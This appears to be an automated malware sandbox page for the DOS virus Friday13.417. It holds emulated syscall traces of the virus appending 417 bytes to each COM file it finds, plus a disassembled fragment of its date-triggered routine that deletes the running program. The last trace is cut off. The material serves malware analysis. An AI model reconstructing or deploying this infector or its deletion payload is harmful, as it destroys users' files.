Sample viewer

vx.netlux.org/Virus.DOS.Friday13.417

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:53:34.116074237Z 26 PC: 12adf | Set disk transfer address
2018-12-17T22:53:34.119211293Z 78 PC: 12ae8 | Find first file
2018-12-17T22:53:34.127699705Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:53:34.134101022Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:53:34.140367437Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:53:34.142214823Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:53:34.143625723Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:53:34.14613877Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:53:34.148563551Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:53:34.312852954Z 62 PC: 12ba8 | Close file
2018-12-17T22:53:34.329287979Z 79 PC: 12af1 | Find next file
2018-12-17T22:53:34.334017087Z 61 PC: 12b21 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:53:34.340568043Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:53:34.346724253Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:53:34.349026Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:53:34.350543818Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:53:34.353274465Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:53:34.362360256Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:53:34.364898194Z 62 PC: 12ba8 | Close file
2018-12-17T22:53:34.372411185Z 79 PC: 12af1 | Find next file
2018-12-17T22:53:34.375234941Z 61 PC: 12b21 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:53:34.382185785Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:53:34.388617899Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:53:34.389977798Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:53:34.392396161Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:53:34.396677343Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:53:34.398726569Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:53:34.408038766Z 62 PC: 12ba8 | Close file
2018-12-17T22:53:34.416673655Z 79 PC: 12af1 | Find next file
2018-12-17T22:53:34.429031642Z 61 PC: 12b21 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:53:34.436899742Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:53:34.443194135Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:53:34.444490274Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:53:34.446752619Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:53:34.449584759Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:53:34.451164466Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:53:34.45491847Z 62 PC: 12ba8 | Close file
2018-12-17T22:53:34.462469567Z 79 PC: 12af1 | Find next file
2018-12-17T22:53:34.465468795Z 61 PC: 12b21 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:53:34.472516513Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:53:34.477208855Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:53:34.478415379Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:53:34.480524058Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:53:34.483433601Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:53:34.484675931Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:53:34.488222347Z 62 PC: 12ba8 | Close file
2018-12-17T22:53:34.49546096Z 79 PC: 12af1 | Find next file
2018-12-17T22:53:34.497946203Z 61 PC: 12b21 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:53:34.504502172Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:53:34.510863655Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:53:34.512146538Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:53:34.514192357Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:53:34.516962884Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:53:34.518284455Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:53:34.522409317Z 62 PC: 12ba8 | Close file
2018-12-17T22:53:34.530576528Z 79 PC: 12af1 | Find next file
2018-12-17T22:53:34.533180765Z 61 PC: 12b21 | Open file (Filename = 'PAH.COM')
2018-12-17T22:53:34.54044688Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:53:34.547160259Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:53:34.54886836Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:53:34.550619258Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:53:34.553557767Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:53:34.555582461Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:53:34.569317828Z 62 PC: 12ba8 | Close file
2018-12-17T22:53:34.577130404Z 79 PC: 12af1 | Find next file
2018-12-17T22:53:34.579734147Z 61 PC: 12b21 | Open file (Filename = 'TEST.COM')
2018-12-17T22:53:34.586587897Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:53:34.589550298Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:53:34.591115521Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:53:34.592732379Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:53:34.595574441Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:53:34.596927114Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:53:34.605468344Z 62 PC: 12ba8 | Close file
2018-12-17T22:53:34.614328236Z 79 PC: 12af1 | Find next file
2018-12-17T22:53:34.616659304Z 26 PC: 12aff | Set disk transfer address
2018-12-17T22:53:34.618084817Z 42 PC: 12bb0 | Get date 0x12bb0: cmp dl, 6
0x12bb3: jne 0x12bd8
0x12bb5: cmp dh, 1
0x12bb8: jne 0x12bd8
0x12bba: xor ax, ax
0x12bbc: mov cx, 0x7fff
0x12bbf: xor di, di
0x12bc1: mov es, word ptr es:[0x2c]
0x12bc6: cld
0x12bc7: repne scasd eax, dword ptr es:[di]
0x12bc9: jne 0x12bd8
0x12bcb: add di, 2
0x12bce: push ds
0x12bcf: push es
0x12bd0: pop ds
0x12bd1: mov ah, 0x41
0x12bd3: mov dx, di
0x12bd5: int 0x21
0x12bd7: pop ds
0x12bd8: pop es
2018-12-17T22:53:34.620446965Z 76 PC: 12a45 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11264,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:16.489470047Z 26 PC: 12adf | Set disk transfer address
2018-12-25T12:30:16.491578329Z 78 PC: 12ae8 | Find first file
2018-12-25T12:30:16.497751918Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:16.504222214Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:16.510407863Z 66 PC: 12b5d | Move file pointer
2018-12-25T12:30:16.512229091Z 66 PC: 12b72 | Move file pointer
2018-12-25T12:30:16.513872038Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:16.516752255Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:30:16.525016778Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-25T12:30:16.539998128Z 62 PC: 12ba8 | Close file
2018-12-25T12:30:16.548799111Z 79 PC: 12af1 | Find next file
2018-12-25T12:30:16.552133181Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.559368013Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.565564938Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.576554584Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.577957213Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.580602639Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.582806898Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.585461408Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.595181231Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.600015745Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.606512428Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.61444739Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.616705719Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.618292198Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.62104839Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.623320031Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.631413952Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.646340462Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.649938721Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.656851012Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.663002586Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.665536996Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.66691295Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.672633523Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.674698149Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.678079499Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.685408188Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.689667467Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.69607402Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.702452618Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.70394404Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.705477199Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.708112805Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.709754259Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.712715622Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.720123142Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.722827094Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.729700249Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.735764209Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.737499617Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.739202108Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.741790103Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.743201919Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.748563852Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.756519705Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.759285701Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.76672718Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.773033505Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.775155248Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.777235196Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.780109946Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.78162921Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.785188204Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.793012864Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.795828671Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.803168187Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.806348056Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.808018965Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.810364021Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.813524524Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.815171435Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.824314521Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.837629684Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.840311985Z 26 PC: 12aff | Set disk transfer address
2018-12-25T12:30:16.841714827Z 42 PC: 12bb0 | Get date 0x12bb0: cmp dl, 6
0x12bb3: jne 0x12bd8
0x12bb5: cmp dh, 1
0x12bb8: jne 0x12bd8
0x12bba: xor ax, ax
0x12bbc: mov cx, 0x7fff
0x12bbf: xor di, di
0x12bc1: mov es, word ptr es:[0x2c]
0x12bc6: cld
0x12bc7: repne scasd eax, dword ptr es:[di]
0x12bc9: jne 0x12bd8
0x12bcb: add di, 2
0x12bce: push ds
0x12bcf: push es
0x12bd0: pop ds
0x12bd1: mov ah, 0x41
0x12bd3: mov dx, di
0x12bd5: int 0x21
0x12bd7: pop ds
0x12bd8: pop es
2018-12-25T12:30:16.845179011Z 76 PC: 12a45 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11264,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:16.502679437Z 26 PC: 12adf | Set disk transfer address
2018-12-25T12:30:16.504907967Z 78 PC: 12ae8 | Find first file
2018-12-25T12:30:16.511796246Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:16.519123909Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:16.526672777Z 66 PC: 12b5d | Move file pointer
2018-12-25T12:30:16.529127456Z 66 PC: 12b72 | Move file pointer
2018-12-25T12:30:16.530692464Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:16.534555636Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:30:16.536488642Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-25T12:30:16.552354304Z 62 PC: 12ba8 | Close file
2018-12-25T12:30:16.56144317Z 79 PC: 12af1 | Find next file
2018-12-25T12:30:16.56492609Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.572579336Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.579639127Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.581626765Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.583333576Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.586467925Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.589120677Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.592304802Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.601188131Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.605551302Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.615303784Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.622636677Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.627907613Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.629506143Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.632435837Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.634145917Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.646677322Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.659574901Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.662496931Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.670847418Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.678555458Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.680193621Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.682316627Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.685336526Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.686834643Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.690188899Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.698847897Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.701779059Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.709610636Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.716610476Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.718906158Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.721061806Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.723907273Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.725438505Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.729499733Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.738370814Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.742524692Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.750289118Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.757940465Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.759753827Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.761402051Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.765094762Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.766607349Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.771032042Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.780876829Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.783635744Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.788919675Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.795239976Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.796498434Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.797922637Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.8005234Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.801777186Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.803777237Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.811173377Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.821462693Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.826985901Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.829876486Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.831582579Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.833721071Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.835752637Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.837560167Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.844373358Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.855415644Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.858001907Z 26 PC: 12aff | Set disk transfer address
2018-12-25T12:30:16.859137622Z 42 PC: 12bb0 | Get date 0x12bb0: cmp dl, 6
0x12bb3: jne 0x12bd8
0x12bb5: cmp dh, 1
0x12bb8: jne 0x12bd8
0x12bba: xor ax, ax
0x12bbc: mov cx, 0x7fff
0x12bbf: xor di, di
0x12bc1: mov es, word ptr es:[0x2c]
0x12bc6: cld
0x12bc7: repne scasd eax, dword ptr es:[di]
0x12bc9: jne 0x12bd8
0x12bcb: add di, 2
0x12bce: push ds
0x12bcf: push es
0x12bd0: pop ds
0x12bd1: mov ah, 0x41
0x12bd3: mov dx, di
0x12bd5: int 0x21
0x12bd7: pop ds
0x12bd8: pop es
2018-12-25T12:30:16.860894599Z 65 PC: 12bd7 | Delete file (Filename = 'A:\TEST.COM')
2018-12-25T12:30:16.87142867Z 76 PC: 12a45 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":6,"Month":2,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11264,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:16.625419308Z 26 PC: 12adf | Set disk transfer address
2018-12-25T12:30:16.629963384Z 78 PC: 12ae8 | Find first file
2018-12-25T12:30:16.635892977Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:16.643359916Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:16.651260753Z 66 PC: 12b5d | Move file pointer
2018-12-25T12:30:16.652749744Z 66 PC: 12b72 | Move file pointer
2018-12-25T12:30:16.654157313Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:16.657801302Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:30:16.659387593Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-25T12:30:16.673155088Z 62 PC: 12ba8 | Close file
2018-12-25T12:30:16.681195444Z 79 PC: 12af1 | Find next file
2018-12-25T12:30:16.684638181Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.691212551Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.697771469Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.702671465Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.704398211Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.70693928Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.708924241Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.711679605Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.717098444Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.720255213Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.725239959Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.729489424Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.730964112Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.732450617Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.735018197Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.73689327Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.750162329Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.755539204Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.758435246Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.762724593Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.767318214Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.768849785Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.774314848Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.776608379Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.778163733Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.78114356Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.789115374Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.792772707Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.800570812Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.807103676Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.808491891Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.810900764Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.813669581Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.815393799Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.818887974Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.826925291Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.829748583Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.835082065Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.841596833Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.844298332Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.846051979Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.847956558Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.84959725Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.852689831Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.85878869Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.861770791Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.867206556Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.871552392Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.872986507Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.875086023Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.878046543Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.879822651Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.884637186Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.892035861Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.894607096Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.90227776Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.90408469Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.905154074Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.906875334Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.908643909Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.909764603Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.915836199Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.921400461Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.936563245Z 26 PC: 12aff | Set disk transfer address
2018-12-25T12:30:16.938779003Z 42 PC: 12bb0 | Get date 0x12bb0: cmp dl, 6
0x12bb3: jne 0x12bd8
0x12bb5: cmp dh, 1
0x12bb8: jne 0x12bd8
0x12bba: xor ax, ax
0x12bbc: mov cx, 0x7fff
0x12bbf: xor di, di
0x12bc1: mov es, word ptr es:[0x2c]
0x12bc6: cld
0x12bc7: repne scasd eax, dword ptr es:[di]
0x12bc9: jne 0x12bd8
0x12bcb: add di, 2
0x12bce: push ds
0x12bcf: push es
0x12bd0: pop ds
0x12bd1: mov ah, 0x41
0x12bd3: mov dx, di
0x12bd5: int 0x21
0x12bd7: pop ds
0x12bd8: pop es
2018-12-25T12:30:16.941802656Z 76 PC: 12a45 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11264,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:16.726671068Z 26 PC: 12adf | Set disk transfer address
2018-12-25T12:30:16.72854113Z 78 PC: 12ae8 | Find first file
2018-12-25T12:30:16.73441871Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:16.740713219Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:16.747422436Z 66 PC: 12b5d | Move file pointer
2018-12-25T12:30:16.748890532Z 66 PC: 12b72 | Move file pointer
2018-12-25T12:30:16.750477422Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:16.754283413Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:30:16.756058016Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-25T12:30:16.769645597Z 62 PC: 12ba8 | Close file
2018-12-25T12:30:16.777807256Z 79 PC: 12af1 | Find next file
2018-12-25T12:30:16.78105916Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.787288231Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.79360608Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.795621444Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.796919135Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.798880187Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.801601994Z 64 PC: 12b97 | Write file or device (See above)
